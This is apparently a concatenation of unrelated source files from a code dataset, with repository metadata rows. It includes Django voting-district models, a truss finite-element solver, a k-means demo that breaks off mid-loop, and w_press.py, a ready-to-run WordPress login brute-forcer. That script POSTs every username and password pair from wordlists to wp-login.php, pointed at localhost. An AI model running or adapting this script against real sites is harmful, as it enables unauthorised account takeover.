#for i in range(len(minimums)):
#ax.annotate(rn[i], xy=(minimums[i], energy_path[minimums[i]]), xytext=(minimums[i]-2, energy_path[minimums[i]]-0.04))#, arrowprops=dict(facecolor='black', shrink=0.05),)
#ax.annotate(rn[i], xy=(minimums[i], energy_path[minimums[i]]), xytext=(minimums[i]-0.2, energy_path[minimums[i]]-0.006))#, arrowprops=dict(facecolor='black', shrink=0.05),)
plt.savefig((f"{fName}.eps"),bbox_inches='tight', dpi=300)
if __name__ == "__main__":
try:
print(argv[0],argv[1],argv[2])
energy_path = np.loadtxt(argv[1])
main(energy_path, argv[2])
#script, params_file, runtime_settings, vcoords_file = argv
except:
print("ERROR: You didn't provide the params file for the programm", argv[0])
| gpl-3.0 | 8,936,404,085,841,171,000 | 37.84375 | 181 | 0.641995 | false | 2.921269 | false | false | false |
psephologic/everyonevoting | everyonevoting/locations/models-dev.py | 1 | 1466 | from django.db import models
from core.models import BaseEMSModel, Organization
class GeoDistrict(BaseEMSModel):
"""EML 150."""
# TODO: At some point, consider using django-mptt
# TODO: Should we have a separate model for the district type, where
# things defining the type of district can be made (ex. pollings places are at this level)?
organization = models.ForeignKey(Organization)
name = models.CharField(max_length=100, default='Global')
LEVEL = (
('Global', 'Global'),
('Continent', 'Continent'),
('Nation', 'Nation'),
)
level = models.CharField(max_length=12, blank=True, null=True, choices=LEVEL, default='Global')
short_name = models.CharField(max_length=20, blank=True)
description = models.CharField(max_length=250, blank=True,
default='The global district all voters and elections are assigned to '
'by default. Elections can take place anywhere in the world.')
parent = models.ForeignKey('GeoDistrict', null=True, blank=True, default=None)
def __str__(self):
return self.name
class PollingLocation(BaseEMSModel):
name = models.CharField(max_length=100, default='Polling Place')
address = models.CharField(max_length=100, blank=True, null=True)
is_active = models.BooleanField(default=True)
geo_district = models.ForeignKey(GeoDistrict, null=True, blank=True, default=None)
def __str__(self):
return self.name | agpl-3.0 | 8,356,047,771,490,293,000 | 38.648649 | 99 | 0.688267 | false | 3.788114 | false | false | false |
satyajeet76626/WordPress_BrutForce | w_press.py | 1 | 5159 | #!usr/bin/python3
# Modules related comments are only applied in this Script.
import requests # Using this module to send request and getting response from local_server.
import sys # Using this module for writting formated text on the terminal.
from colorama import Fore,Style # Using this module for Formating my text means appling color,style,size.. etc
import time
import os # Using this module to print execution time of main() function.
def main():
os.system("clear") # clear the screen.
print(Fore.CYAN + "##########################################################// \\\################################################################")
print(Fore.CYAN + "#########################################################// $ $ WeLCoMe $ $ \\\###############################################################")
time.sleep(0.5)
print(Fore.CYAN + '''########################################################// \\\##############################################################''')
time.sleep(0.5)
print(Fore.CYAN + '''#######################################################// \\\#############################################################''')
time.sleep(0.5)
print(Fore.CYAN + "######################################################// \\\############################################################")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t#// W_PRESS.PY \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t#//''''''''''''''''''''''''''''''''''\\\#")
time.sleep(0.5)
print(Fore.CYAN +"\t\t\t\t\t\t#//________Written By: Satyajeet________\\\#")
time.sleep(0.5)
print(Fore.RED+'\n\n\t\t'+Fore.YELLOW+'Watch: https://youtu.be/sh2klOT3uws ||'+Fore.RED+'|| Download: https://github.com/satyajeet76626/WordPress_BrutForce.git')
time.sleep(0.3)
print(Fore.RED + "\n\n\t\t\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> WaRnInG..!!! : <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
time.sleep(0.3)
print(Fore.RED + '\n\t\t\t\t"::::::::If you are not able to RUN this script, Please! Read README file::::::::"')
print(Fore.RED + '\n\t\t\t\t:::::::::::::::::::::::::::'+Fore.YELLOW +'"OR Run installer.py"'+Fore.RED+':::::::::::::::::::::::::::::::')
# collecting url in a variable 'url'.
url = 'http://localhost/wp-login.php'
print(Fore.CYAN+"\n\nNOTE : "+Fore.WHITE+"Put your 'Users_list' and 'Password_list' File in same directory where 'w_press.py Script is.'" )
print(Fore.YELLOW + "\n\nW_PrEsS >> ",end=' ')
# Taking input of users_list and password_list from user.
userslist_file=input(Fore.GREEN + "Enter Users_list fileName: ")
print(Fore.YELLOW + "\n\nW_PrEsS >> ",end=' ')
passwordslist_file=input(Fore.GREEN + "Enter Password_list fileName: ")
# Reading UserName and PassWord from files.
users=open(userslist_file,'r').readlines()
passwords=open(passwordslist_file,'r').readlines()
print(Fore.YELLOW+"\n\t\t\t______________Thanks For Using..!! ('Sit_back && Have Your Coffee!')________________")
# Finding Total Number of UserNames and PassWords
users_len=len(users)
pass_len=len(passwords)
total=(users_len*pass_len)
print(Fore.CYAN + "\n\n\rTotAl Passw0rD tO TrY: ",total)
c=0
for user in users:
for passwd in passwords:
# Sending request and getting response with UserName & PassWord to the local server(apache2) on wordpress website.
http = requests.post(url, data = {'log':user,'pwd':passwd,'wp-submit':'Log In'})
datas = http.content
# tryingh to match word 'Dashboard' in the content.
if 'Dashboard' in str(datas):
c+=1
complete=(c*100)//total
# Formatting My OutPut to display my contents in a better way.
sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd UserName: " + Fore.GREEN + "'{}'".format(user))
sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd PassW0rd: " + Fore.GREEN + "'{}'".format(passwd))
print(Fore.BLUE + "\n\nPasswords checked: ",end=" ")
print(Fore.GREEN + "{}".format(c),)
print(Fore.MAGENTA + "\t\t\t\t\t"+ Fore.GREEN +" {}%".format(complete),end=' ')
print(Fore.MAGENTA+"CompLeTed.....\n\n")
# Quiting or Breaking the loop.
quit()
else:
c+=1
complete=(c*100)//total
sys.stdout.write(Fore.RED + "\r\t\t\t\t\t\t[-] tRyInG....."+Fore.GREEN + "\t{}%".format(complete))
sys.stdout.flush()
print(Fore.CYAN+"\n\n\t\t\t\t\t\tSoRRy!!, PaSSwOrD NoT FoUnD.!\n")
quit()
# Resetting the Formated text color and styles.
# print(Style.RESSET)
# Uncomment below lines to display program execution time.
# t0=time.time()
# main()
# t1=time.time()
# print("ExecuTion Time: ",t1-t0)
if __name__=='__main__':main()
| mit | -6,060,353,860,117,834,000 | 45.9 | 169 | 0.499128 | false | 3.092926 | false | false | false |
rgrandin/MechanicsTools | truss/truss_solver.py | 1 | 22478 | #
# -*- coding: utf-8 -*-
#
# Python-Based Truss Solver
# =============================================================
#
# Author: Robert Grandin
#
# Date: Fall 2007 (Creation of original Fortran solution in AerE 361)
# October 2011 (Python implementation)
# November 2014 (Clean-up and graphical/VTK output)
#
#
# PURPOSE:
# This code solves a truss for the internal load, strain, and stress of each member.
# Being a truss, all members are assumed to be two-force members and no bending
# moments are considered. Both 2-dimensional and 3-dimensional trusses can be
# solved with this code.
#
#
# INSTRUCTIONS & NOTES:
# - Dictionaries are used to define the entity properties. Names for the properties
# should be self-explanatory. Some notes:
# - '_flag' entries identify either displacement ('d') or force ('f') boundary
# conditions (BCs). Applied forces require force BCs to be specified.
# Pin/roller locations require displacement BCs. Free-to-move nodes will
# typically have 0-force BCs.
# - '_bcval' entries specify the BC value for the corresponding flag.
# - If solving a 2-dimensional problem, constrain node motion in the 3rd
# dimension to be 0. Allowing nodal motion in the 3rd dimension (by setting
# the constraint to 0-force) will produce a matrix with non-empty null-space.
# Displacements in the third dimension will reside in this null-space.
# - Input data can be saved in a python data file. Create a module for your
# problem and define a function which returns 'nodes, members'.
# - Examples shown below for 2D, 3D, and file-based input. See data file
# 'em514_problem08.py' for an example of how to write an input file.
#
#
# HOMEWORK DISCLAIMER:
# This tool is intended to be a learning aid. Feel free to use it to check your
# work, but do not use it in place of learning how to find the solution yourself.
#
# When using this tool for statics problems, the member loads calculated by this
# tool will not match the correct answer for the statics problem. This is due
# to the fact that this tool considers displacements whereas displacements are
# not considered in a statics problem (but displacements are considered in
# mechanics problems). Even though the numerical results will not match when
# checking statics results, the discrepancy should be small enough to enable
# you to determine if your statics result is correct.
#
#
#
# ========================
#
# 2D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -800.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 36.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 72.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 36.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -1000.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 1, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 2, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 0, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# 3D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 20.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': 0.0e0, 'zflag': 'f', 'zbcval': 1000.0e0})
#nodes.append({'x': 0.0e0, 'y': 25.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 0.0e0, 'y': 0.0e0, 'z': 10.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 3, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# DATA FILE SAMPLE INPUT
#
import em274_assess5_2017 # Name of python file, no extension
reload(em274_assess5_2017) # Force reload to catch any updates/revisions
nodes, members = em274_assess5_2017.DefineInputs() # Call input-definition function
# Set scale factor to make display more-easily understood.
displayScaleFactor = 100.0
# =============================================================================================
#
#
#
# NO EDITS REQUIRED BELOW HERE
#
#
#
# =============================================================================================
# ========================
#
# IMPORT PYTHON MODULES REQUIRED FOR SOLUTION
#
import numpy # General linear algebra capability
import scipy # Advanced routines for evaluating solution quality
import matplotlib.pyplot as plt # 2D plotting
# ========================
#
# ECHO INPUT VALUES TO SCREEN
#
# Calculate Member Properties
nnodes = len(nodes)
nmem = len(members)
# Write Input Information
print(' ')
print('==============================================')
print(' ')
print(' INPUT INFORMATION')
print(' ')
print('==============================================')
print(' ')
print('Pin Input Information')
print('--------------------------------------')
for i in range(nnodes):
print('Node % 3d' % (i))
print(' Position: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['x'], nodes[i]['y'], nodes[i]['z']))
print(' BC Type: ( %*.*s, %*.*s, %*.*s )' % (12,12,nodes[i]['xflag'], 12,12,nodes[i]['yflag'], 12,12,nodes[i]['zflag']))
print(' BC Value: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['xbcval'], nodes[i]['ybcval'], nodes[i]['zbcval']))
print(' ')
print(' ')
print(' ')
print(' ')
print('Member Input Information')
print('--------------------------------------')
for i in range(nmem):
print('Member % 3d' % (i))
print(' Start, end nodes: ( % 3d, % 3d )' % (members[i]['start'], members[i]['end']))
print(' Young\'s Modulus: % 12.3g' % (members[i]['E']))
print(' Cross-sectional Area: % 12.3g' % (members[i]['A']))
print(' Yield Strength: % 12.3g' % (members[i]['sigma_yield']))
print(' Ultimate Strength: % 12.3g' % (members[i]['sigma_ult']))
print(' ')
print(' ')
print(' ')
print(' ')
# ========================
#
# SETUP MATRIX EQUATION AND SOLVE
#
# Calculate member properties
for i in range(nmem):
dx = nodes[members[i]['end']]['x'] - nodes[members[i]['start']]['x']
dy = nodes[members[i]['end']]['y'] - nodes[members[i]['start']]['y']
dz = nodes[members[i]['end']]['z'] - nodes[members[i]['start']]['z']
members[i]['L'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
members[i]['costheta_x'] = dx/members[i]['L']
members[i]['costheta_y'] = dy/members[i]['L']
members[i]['costheta_z'] = dz/members[i]['L']
# Build stiffness matrix
stiffness = numpy.zeros((3*nnodes,3*nnodes), dtype='float64')
G = numpy.zeros((6,6), dtype='float64')
for i in range(nmem):
tbm2 = 3*members[i]['start'] + 2
tbm1 = 3*members[i]['start'] + 1
tb = 3*members[i]['start']
tem2 = 3*members[i]['end'] + 2
tem1 = 3*members[i]['end'] + 1
te = 3*members[i]['end']
k = members[i]['A']*members[i]['E']/members[i]['L']
stiffness[tb][tb] += k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[tb][tbm1] += k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[tb][tbm2] += k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tb][te] += -k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[tb][tem1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[tb][tem2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tbm1][tb] += k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tbm1][tbm1] += k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tbm1][tbm2] += k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tbm1][te] += -k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tbm1][tem1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tbm1][tem2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tbm2][tb] += k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tbm2][tbm1] += k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tbm2][tbm2] += k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[tbm2][te] += -k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tbm2][tem1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tbm2][tem2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[te][tb] += -k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[te][tbm1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[te][tbm2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[te][te] += k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[te][tem1] += k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[te][tem2] += k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tem1][tb] += -k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tem1][tbm1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tem1][tbm2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tem1][te] += k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tem1][tem1] += k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tem1][tem2] += k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tem2][tb] += -k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tem2][tbm1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tem2][tbm2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[tem2][te] += k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tem2][tem1] += k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tem2][tem2] += k*members[i]['costheta_z']*members[i]['costheta_z']
# Calculate average of main diagonal for numerical stability
average = 0.0e0
for i in range(3*nnodes):
average += stiffness[i][i]
average /= float(3*nnodes)
# Create and fill arrays to be used when solving matrix equation
A = numpy.zeros(stiffness.shape, dtype='float64')
b = numpy.zeros((3*nnodes,1), dtype='float64')
for i in range(nnodes):
icol = 3*i
if(nodes[i]['xflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['xbcval']
A[icol][icol] = -average
if(nodes[i]['xflag'] == 'f'):
b[icol] += nodes[i]['xbcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
icol = 3*i + 1
if(nodes[i]['yflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['ybcval']
A[icol][icol] = -average
if(nodes[i]['yflag'] == 'f'):
b[icol] += nodes[i]['ybcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
icol = 3*i + 2
if(nodes[i]['zflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['zbcval']
A[icol][icol] = -average
if(nodes[i]['zflag'] == 'f'):
b[icol] += nodes[i]['zbcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
# Solve the system
x,res,rank,singularvals = numpy.linalg.lstsq(A,b)
# Calculate nodal results
for i in range(nnodes):
if(nodes[i]['xflag'] == 'f'):
nodes[i]['xdisp'] = x[3*i+0][0]
nodes[i]['xforce'] = nodes[i]['xbcval']
if(nodes[i]['xflag'] == 'd'):
nodes[i]['xdisp'] = nodes[i]['xbcval']
nodes[i]['xforce'] = x[3*i+0][0]
if(nodes[i]['yflag'] == 'f'):
nodes[i]['ydisp'] = x[3*i+1][0]
nodes[i]['yforce'] = nodes[i]['ybcval']
if(nodes[i]['yflag'] == 'd'):
nodes[i]['ydisp'] = nodes[i]['ybcval']
nodes[i]['yforce'] = x[3*i+1][0]
if(nodes[i]['zflag'] == 'f'):
nodes[i]['zdisp'] = x[3*i+2][0]
nodes[i]['zforce'] = nodes[i]['zbcval']
if(nodes[i]['zflag'] == 'd'):
nodes[i]['zdisp'] = nodes[i]['zbcval']
nodes[i]['zforce'] = x[3*i+2][0]
nodes[i]['xnew'] = nodes[i]['x'] + nodes[i]['xdisp']
nodes[i]['ynew'] = nodes[i]['y'] + nodes[i]['ydisp']
nodes[i]['znew'] = nodes[i]['z'] + nodes[i]['zdisp']
# Calculate member results
for i in range(nmem):
dx = nodes[members[i]['end']]['xnew'] - nodes[members[i]['start']]['xnew']
dy = nodes[members[i]['end']]['ynew'] - nodes[members[i]['start']]['ynew']
dz = nodes[members[i]['end']]['znew'] - nodes[members[i]['start']]['znew']
members[i]['Lnew'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
members[i]['epsilon'] = (members[i]['Lnew'] - members[i]['L'])/members[i]['L']
members[i]['stress'] = members[i]['epsilon']*members[i]['E']
members[i]['load'] = members[i]['stress']*members[i]['A']
# Calculate null space of A (http://stackoverflow.com/questions/2992947/calculating-the-null-space-of-a-matrix)
u, s, vh = numpy.linalg.svd(A)
null_mask = (s <= 1.0e-15)
null_space = scipy.compress(null_mask, vh, axis=0)
nullspace = scipy.transpose(null_space)
# ========================
#
# OUTPUT RESULTS TO TERMINAL
#
print(' ')
print('==============================================')
print(' ')
print(' RESULTS')
print(' ')
print('==============================================')
print(' ')
print('Pin Displacements (x,y,z)')
print('--------------------------------------')
for i in range(nnodes):
print('Node % 3d: % 10.5e % 10.5e % 10.5e' % (i,nodes[i]['xdisp'],nodes[i]['ydisp'],nodes[i]['zdisp']))
print(' ')
print(' ')
print('Member Results')
print('--------------------------------------')
for i in range(nmem):
print('Member % 3d:' % (i))
print(' Internal Load: % 10.5e' % (members[i]['load']))
print(' Axial Strain: % 10.5e' % (members[i]['epsilon']))
print(' Axial Stress: % 10.5e' % (members[i]['stress']))
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
print(' --> YIELD STRESS SURPASSED')
if(members[i]['stress'] > members[i]['sigma_ult']):
print(' --> ULTIMATE STRESS SURPASSED')
print(' ')
print(' ')
print(' ')
print(' ')
print('==============================================')
print(' ')
print(' SOLUTION QUALITY INDICATORS')
print(' ')
print('==============================================')
print(' ')
print('Rank of A matrix: %d' % (rank))
print(' ')
print('Size of A: %d' % (3*nnodes))
print(' ')
print('Condition Number: % 10.3e (smaller is better)' % (singularvals.max()/singularvals.min()))
print(' General rule: If condition number is O(10^n), discard last n digits')
print(' from the results.')
print(' ')
print('Singular values: ')
for i in range(len(singularvals)):
print(' % 12.10g' % (singularvals[i]))
print(' ')
print('Nullspace of A:')
print nullspace
# ========================
#
# GENERATE PLOTS
#
xOriginal = numpy.zeros((nnodes))
yOriginal = numpy.zeros((nnodes))
zOriginal = numpy.zeros((nnodes))
xNew = numpy.zeros((nnodes))
yNew = numpy.zeros((nnodes))
zNew = numpy.zeros((nnodes))
for i in range(nnodes):
xOriginal[i] = nodes[i]['x']
xNew[i] = xOriginal[i] + nodes[i]['xdisp']*displayScaleFactor
yOriginal[i] = nodes[i]['y']
yNew[i] = yOriginal[i] + nodes[i]['ydisp']*displayScaleFactor
zOriginal[i] = nodes[i]['z']
zNew[i] = zOriginal[i] + nodes[i]['zdisp']*displayScaleFactor
xmin1 = numpy.min(xOriginal)
xmin2 = numpy.min(xNew)
xmin = min(xmin1,xmin2)
ymin1 = numpy.min(yOriginal)
ymin2 = numpy.min(yNew)
ymin = min(ymin1,ymin2)
zmin1 = numpy.min(zOriginal)
zmin2 = numpy.min(zNew)
zmin = min(zmin1,zmin2)
xmax1 = numpy.max(xOriginal)
xmax2 = numpy.max(xNew)
xmax = min(xmax1,xmax2)
ymax1 = numpy.max(yOriginal)
ymax2 = numpy.max(yNew)
ymax = min(ymax1,ymax2)
zmax1 = numpy.max(zOriginal)
zmax2 = numpy.max(zNew)
zmax = min(zmax1,zmax2)
xRange = xmax - xmin
yRange = ymax - ymin
zRange = zmax - zmin
factor = 0.02
# Generate XY view
plt.figure()
plt.plot(xOriginal, yOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(xNew, yNew, 'or', label='New Position')
for i in range(nmem):
xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
yy = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
yy2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
plt.ylim([ymin - yRange*factor, ymax + yRange*factor])
plt.xlabel('X Position')
plt.ylabel('Y Position')
plt.title('Truss - XY View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_XY_View.png')
# If displacement in the Z-direction exists, plot XZ and YZ views. Note that
# the zRange cannot be compared to precisely '0' due to floating-point errors,
# so it is compared to a very small value instead. Also note that 'x' and 'y'
# refer to the 2D plot and therefore do not necessarily correspond directly
# to the 'x' and 'y' coordinates of the nodes.
if(zRange > 1.0e-5):
plt.figure()
plt.plot(xOriginal, zOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(xNew, zNew, 'or', label='New Position')
for i in range(nmem):
xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
plt.xlabel('X Position')
plt.ylabel('Z Position')
plt.title('Truss - XZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_XZ_View.png')
plt.figure()
plt.plot(yOriginal, zOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(yNew, zNew, 'or', label='New Position')
for i in range(nmem):
xx = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([ymin - yRange*factor, ymax + yRange*factor])
plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
plt.xlabel('Y Position')
plt.ylabel('Z Position')
plt.title('Truss - YZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_YZ_View.png')
# Write results to VTK files to enable more-flexible visualization via ParaView
# (or any other VTK-supporting viewer)
f = open('TrussOriginal.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Original Configuration \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
f.write(str(nodes[i]['x']) + " " + str(nodes[i]['y']) + " " + str(nodes[i]['z']) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
f.write("3 \n") # All "cells" are of type VTK_LINE
f.close()
f = open('TrussNew.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Deformed Configuration - Deformation scaled by " + str(displayScaleFactor) + "x \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
f.write(str(xNew[i]) + " " + str(yNew[i]) + " " + str(zNew[i]) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
f.write("3 \n") # All "cells" are of type VTK_LINE
f.close()
| bsd-3-clause | -8,282,621,646,964,861,000 | 35.080257 | 150 | 0.569891 | false | 2.738214 | false | false | false |
r2m/machine-learning | k-means/lab2/main.py | 1 | 3130 | import numpy as np
import matplotlib.cm as cm
import KMeans as kmeans
from Point import Point
from Plotter import Plotter
from Centroid import Centroid
def loadData(fileName):
"""
Returns two data sets.
First return value is the x values and the second one is the y values.
"""
data = np.loadtxt(fileName)
data = map(list, zip(* data)) # Magic ;)
return (data[0], data[1])
def getCentroids(clusterPoints):
centroids = []
colors = iter(cm.rainbow(np.linspace(0, 1, len(clusterPoints))))
for index in xrange(0, len(clusterPoints)):
centroids.append(Centroid(clusterPoints[index], next(colors), index))
return centroids
if __name__ == '__main__':
# Init the plotter with some axis parameters
plotter = Plotter([-20, 80], [-20, 80])
# Load data
# TODO Try loading the smallDataSet.txt and see what happens.
# Try not to use the large data sets since the program will be quite slow
# If you want a different dataset talk to @Johan
trainingX, trainingY = loadData('testData.txt')
print "Init - show the data..."
# Just show the data
plotter.plotUnlabledData(trainingX, trainingY)
plotter.show()
raw_input('Press enter to continue')
# Define the centroids based on some points
print "Init - Create the first cluster points and plot them..."
# TODO here is where you change the number of centroids by adding or removing the points.
# The numbers represent the starting points of each centroid with the following coordinate pair: (x, y)
clusterPoints = [Point(2, 3), Point(35, 20), Point(40, 40), Point(60, 60), Point(30, 30)]
centroids = getCentroids(clusterPoints) # just convert the points to centroids for plotting and labeling assistance...
plotter.plotCentroids(centroids)
print "Init complete..."
raw_input('Press enter to continue and to start the algorithm.')
# Run the algorith 10 times
# TODO So right now we are running the algorithm 10 times. Maybe we should come up with some better meassurement?
for x in xrange(1,10):
